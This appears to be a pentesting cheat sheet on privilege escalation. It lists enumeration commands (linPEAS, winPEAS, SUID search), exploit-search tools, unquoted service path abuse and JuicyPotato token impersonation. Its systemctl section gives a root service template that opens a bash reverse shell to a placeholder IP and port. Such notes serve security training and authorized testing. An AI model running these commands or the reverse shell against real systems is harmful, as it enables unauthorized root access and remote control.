Privilege Escalation
Enum
Linux
Windows
linPEAS.sh ⚙
# Basic linPEAS.sh usage
# tee command: read stdin and write to stdout & file
$ ./linpeas.sh | tee log.txt
winPEAS.exe ⚙
# winPEAS.exe
$ .\winPEAS.exe
Linux Find SUID files
# Use the command 'find'
$ find / -perm -4000 -type f 2>/dev/null
Windows Privilege Information
# current user priv info
$ whoami /priv
Exploit Search
# SearchSploit
# update exploitdb packages
$ searchsploit -u
# for searchsploit usage & options
$ searchsploit -h
# wes.py
# update database
$ ./windows-exploit-suggester.py --update
# suggest possible exploits
$ ./windows-exploit-suggester.py --database [yyyy-mm-dd-mssb.xlsx] --systeminfo [systeminfo.txt]
Linux systemctl
# Template service file
# * Absolute path for binaries
# systemctl enable xxxxx.service (absolute path)
# systemctl start xxxxx
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/[ip]/[port] 0>&1'
[Install]
WantedBy=multi-user.target
Windows Unquoted Path Service Vulnerability
# enumeration
$ powershell -c "Get-Service"
$ sc qc [serviceName]
# search non Microsoft service
# auto-restart + unquoted
$ wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\windows\\" | findstr /i /v """
# exploit
$ sc stop [serviceName]
$ sc start [serviceName]
Windows Token Impersonation
# JuicyPotato
# https://github.com/ohpe/juicy-potato
$ JuicyPotato.exe -l [port] -p C:\[program path] -t * -c [CLSID]
# use .bat to execute the command
$ JuicyPotato.exe -l [port] -p C:\[.bat path] -t * -c [CLSID]